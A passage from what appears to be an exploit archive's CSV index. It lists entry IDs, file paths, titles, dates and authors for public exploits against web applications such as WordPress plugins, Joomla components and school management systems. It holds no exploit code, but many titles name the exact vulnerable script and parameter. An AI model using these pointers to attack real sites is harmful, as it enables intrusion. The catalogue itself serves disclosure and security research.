Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps, -38868,exploits/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps, -38869,exploits/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps, -38870,exploits/php/webapps/38870.txt,"WordPress Plugin Easy Career Openings - 'jobid' SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps, -38872,exploits/php/webapps/38872.php,"WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps, -38873,exploits/php/webapps/38873.txt,"eduTrac - 'showmask' Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps, -38874,exploits/php/webapps/38874.txt,"BoastMachine - 'blog' SQL Injection",2013-12-13,"Omar Kurt",php,webapps, -38875,exploits/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps, -38876,exploits/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp?pa' SQL Injection",2013-12-16,R3d-D3V!L,php,webapps, -38877,exploits/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,php,webapps, -38879,exploits/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,asp,webapps, -38880,exploits/php/webapps/38880.txt,"Veno File Manager - 'q' Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps, -38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps, -38882,exploits/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps, -38883,exploits/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps, -38884,exploits/asp/webapps/38884.txt,"Dynamic Biz Website Builder 'QuickWeb' 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps, -38885,exploits/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps, -38886,exploits/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps, -38887,exploits/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps, -38888,exploits/php/webapps/38888.txt,"iScripts AutoHoster - 'invno' SQL Injection",2013-12-15,i-Hmx,php,webapps, -38889,exploits/php/webapps/38889.txt,"iScripts AutoHoster - 'main_smtp.php' Traversal",2013-12-15,i-Hmx,php,webapps, -38890,exploits/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Local File Inclusion",2013-12-15,i-Hmx,php,webapps, -38891,exploits/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Local File Inclusion",2013-12-15,i-Hmx,php,webapps, -38892,exploits/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Local File Inclusion",2013-12-15,i-Hmx,php,webapps, -38895,exploits/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80 -38896,exploits/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity Processing",2015-12-08,LiquidWorm,xml,webapps, -38897,exploits/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps, -38898,exploits/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps, -38899,exploits/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps, -38901,exploits/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 -38902,exploits/php/webapps/38902.txt,"WordPress Plugin Polls Widget 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 -38906,exploits/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 -38907,exploits/php/webapps/38907.txt,"Osclass - Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps, -38908,exploits/php/webapps/38908.txt,"Leed - 'id' SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps, -38913,exploits/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps, -38914,exploits/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps, -38915,exploits/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 -38919,exploits/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps, -40437,exploits/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps, -38920,exploits/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps, -38921,exploits/php/webapps/38921.txt,"AFCommerce - 'adminpassword.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps, -38922,exploits/php/webapps/38922.txt,"AFCommerce - 'controlheader.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps, -38924,exploits/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps, -38927,exploits/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 -38928,exploits/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80 -38929,exploits/hardware/webapps/38929.txt,"Skybox Platform < 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 -38935,exploits/asp/webapps/38935.txt,"CMS Afroditi - 'id' SQL Injection",2013-12-30,"projectzero labs",asp,webapps, -38936,exploits/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps, -38938,exploits/php/webapps/38938.txt,"xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps, -38941,exploits/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps, -38942,exploits/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps, -38943,exploits/php/webapps/38943.txt,"Joomla! Component com_aclsfgpl - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps, -38944,exploits/php/webapps/38944.txt,"Command School Student Management System - '/sw/admin_grades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38945,exploits/php/webapps/38945.txt,"Command School Student Management System - '/sw/admin_terms.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38946,exploits/php/webapps/38946.txt,"Command School Student Management System - '/sw/admin_school_years.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38947,exploits/php/webapps/38947.txt,"Command School Student Management System - '/sw/admin_sgrades.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38948,exploits/php/webapps/38948.txt,"Command School Student Management System - '/sw/admin_media_codes_1.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38949,exploits/php/webapps/38949.txt,"Command School Student Management System - '/sw/admin_infraction_codes.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38950,exploits/php/webapps/38950.txt,"Command School Student Management System - '/sw/admin_generations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38951,exploits/php/webapps/38951.txt,"Command School Student Management System - '/sw/admin_relations.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38952,exploits/php/webapps/38952.txt,"Command School Student Management System - '/sw/admin_titles.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38953,exploits/php/webapps/38953.txt,"Command School Student Management System - '/sw/health_allergies.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38954,exploits/php/webapps/38954.txt,"Command School Student Management System - '/sw/admin_school_names.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38955,exploits/php/webapps/38955.txt,"Command School Student Management System - '/sw/admin_subjects.php?id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38956,exploits/php/webapps/38956.txt,"Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38957,exploits/php/webapps/38957.html,"Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38958,exploits/php/webapps/38958.html,"Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38965,exploits/php/webapps/38965.txt,"ECommerceMajor - 'productdtl.php?prodid' SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 -38966,exploits/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 -39096,exploits/php/webapps/39096.txt,"i-doit Pro - 'objID' SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps, -39098,exploits/php/webapps/39098.txt,"Joomla! Component com_wire_immogest - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps, -39057,exploits/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",php,webapps, -38971,exploits/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Directory Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 -38975,exploits/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80 -38976,exploits/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80 -38977,exploits/php/webapps/38977.py,"Joomla! 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps, -38981,exploits/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 -38984,exploits/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 -38985,exploits/php/webapps/38985.txt,"Dredge School Administration System - '/DSM/loader.php?Id' SQL Injection",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38986,exploits/php/webapps/38986.txt,"Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38987,exploits/php/webapps/38987.html,"Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation)",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38988,exploits/php/webapps/38988.txt,"Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps, -38989,exploits/php/webapps/38989.txt,"Ovidentia bulletindoc Module 2.9 - Multiple Remote File Inclusions",2015-12-15,bd0rk,php,webapps,80 -38991,exploits/php/webapps/38991.pl,"Ovidentia NewsLetter Module 2.2 - 'admin.php' Remote File Inclusion",2015-12-16,bd0rk,php,webapps,80 -39011,exploits/php/webapps/39011.txt,"UAEPD Shopping Script - 'products.php' Multiple SQL Injections",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps, -39012,exploits/php/webapps/39012.txt,"UAEPD Shopping Script - 'news.php?id' SQL Injection",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps, -39013,exploits/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps, -39014,exploits/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,AtT4CKxT3rR0r1ST,php,webapps, -39015,exploits/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps, -39016,exploits/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps, -39017,exploits/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 -39028,exploits/php/webapps/39028.txt,"Joomla! Component Sexy polling 1.0.8 - 'answer_id' SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps, -39029,exploits/php/webapps/39029.txt,"BloofoxCMS - '/bloofox/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps, -39030,exploits/php/webapps/39030.txt,"BloofoxCMS - '/bloofox/admin/index.php?Username' SQL Injection",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps, -39031,exploits/php/webapps/39031.html,"BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin)",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps, -39032,exploits/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Local File Inclusion",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps, -39033,exploits/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 -39034,exploits/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 -39099,exploits/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset",2014-02-12,Slotleet,php,webapps, -39038,exploits/php/webapps/39038.txt,"pfSense 2.2.5 - Directory Traversal",2015-12-18,R-73eN,php,webapps, -39058,exploits/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps, -39059,exploits/php/webapps/39059.txt,"WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps, -39060,exploits/php/webapps/39060.txt,"XOS Shop - 'goto' SQL Injection",2014-01-24,JoKeR_StEx,php,webapps, -39062,exploits/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,php,webapps, -39063,exploits/php/webapps/39063.txt,"WordPress Plugin WP E-Commerce - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps, -39064,exploits/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps, -39065,exploits/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps, -39066,exploits/php/webapps/39066.txt,"Eventum 2.3.4 - 'hostname' Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps, -39068,exploits/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,php,webapps, -39069,exploits/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80 -39078,exploits/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps, -39079,exploits/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps, -39080,exploits/php/webapps/39080.txt,"Atmail WebMail - 'searchResultsTab5?filter' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps, -39081,exploits/php/webapps/39081.txt,"Atmail WebMail - 'INBOX.Trash?mailId' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps, -39083,exploits/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusions",2015-12-23,bd0rk,php,webapps,80 -39084,exploits/php/webapps/39084.txt,"Grawlix 1.0.3 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 -39085,exploits/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 -39086,exploits/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 -39087,exploits/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps, -39088,exploits/php/webapps/39088.txt,"Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps, -39090,exploits/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps, -39093,exploits/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 -39094,exploits/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 -39100,exploits/php/webapps/39100.txt,"WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps, -39101,exploits/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps, -39106,exploits/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps, -39107,exploits/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps, -39108,exploits/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps, -39109,exploits/php/webapps/39109.txt,"WordPress Plugin Relevanssi - 'category_name' SQL Injection",2014-03-04,anonymous,php,webapps, -39110,exploits/php/webapps/39110.txt,"Cory Jobs Search - 'cid' SQL Injection",2014-03-05,Slotleet,php,webapps, -39111,exploits/php/webapps/39111.php,"WordPress Plugin Premium Gallery Manager - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps, -39113,exploits/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Multiple SQL Injections",2014-03-08,"Nawaf Alkeraithe",php,webapps, -39116,exploits/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",php,webapps, -39117,exploits/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps, -39118,exploits/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps, -39124,exploits/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps, -39126,exploits/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps, -39127,exploits/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps, -39128,exploits/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps, -39129,exploits/php/webapps/39129.txt,"qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps, -39130,exploits/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps, -39131,exploits/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps, -39133,exploits/php/webapps/39133.php,"WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 -39135,exploits/php/webapps/39135.php,"WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps, -39136,exploits/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps, -39137,exploits/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps, -39139,exploits/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps, -39140,exploits/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps, -39141,exploits/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps, -39142,exploits/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Directory Traversals",2014-04-14,"Jan Kadijk",jsp,webapps, -39143,exploits/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer?file' Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps, -39145,exploits/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps, -39146,exploits/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps, -39150,exploits/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps, -42552,exploits/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps, -42553,exploits/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps, -42563,exploits/php/webapps/42563.txt,"Joomla! Component Photo Contest 1.0.2 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps, -39153,exploits/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps, -39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps, -39157,exploits/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps, -39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80 -39168,exploits/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80 -39170,exploits/xml/webapps/39170.txt,"Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities",2016-01-05,"Sebastian Perez",xml,webapps, -39171,exploits/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps, -39172,exploits/php/webapps/39172.txt,"PrestaShop - 'getSimilarManufacturer.php?id_manufacturer' SQL Injection",2014-05-05,indoushka,php,webapps, -39173,exploits/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",php,webapps, -39174,exploits/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",php,webapps, -39176,exploits/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps, -39178,exploits/php/webapps/39178.txt,"CMS Touch - 'pages.php?Page_ID' SQL Injection",2014-05-08,indoushka,php,webapps, -39179,exploits/php/webapps/39179.txt,"CMS Touch - 'news.php?News_ID' SQL Injection",2014-05-08,indoushka,php,webapps, -39184,exploits/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps, -39187,exploits/asp/webapps/39187.txt,"CIS Manager - 'email' SQL Injection",2014-05-16,Edge,asp,webapps, -39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps, -39189,exploits/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps, -39190,exploits/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps, -39191,exploits/php/webapps/39191.txt,"Clipperz Password Manager - '/backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps, -39192,exploits/hardware/webapps/39192.rb,"D-Link DCS-931L - Arbitrary File Upload (Metasploit)",2016-01-07,Metasploit,hardware,webapps, -39193,exploits/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps, -39197,exploits/php/webapps/39197.txt,"WordPress Plugin Booking System (Booking Calendar) - 'booking_form_id' SQL Injection",2014-05-21,maodun,php,webapps, -39198,exploits/php/webapps/39198.html,"User Cake - Cross-Site Request Forgery",2014-05-25,"Dolev Farhi",php,webapps, -39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",python,webapps, -39200,exploits/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps, -39202,exploits/php/webapps/39202.txt,"WordPress Plugin WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps, -39206,exploits/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",php,webapps, -39210,exploits/php/webapps/39210.txt,"Seo Panel - 'file' Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps, -39211,exploits/php/webapps/39211.txt,"WordPress Theme Infocus - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps, -39212,exploits/php/webapps/39212.txt,"WordPress Plugin JW Player for Flash & HTML5 Video - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps, -39213,exploits/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps, -39223,exploits/php/webapps/39223.txt,"ZeusCart - 'prodid' SQL Injection",2014-06-24,"Kenny Mathis",php,webapps, -39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps, -39234,exploits/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,php,webapps,80 -39235,exploits/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 -39236,exploits/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps, -39237,exploits/php/webapps/39237.txt,"WordPress Plugin NextGEN Gallery 1.9.1 - 'photocrati_ajax' Arbitrary File Upload",2014-05-19,SANTHO,php,webapps, -39238,exploits/php/webapps/39238.txt,"AtomCMS - SQL Injection / Arbitrary File Upload",2014-07-07,"Jagriti Sahu",php,webapps, -39239,exploits/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,php,webapps, -39240,exploits/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - '/wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",php,webapps, -39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,java,webapps,4848 -39243,exploits/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 -39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80 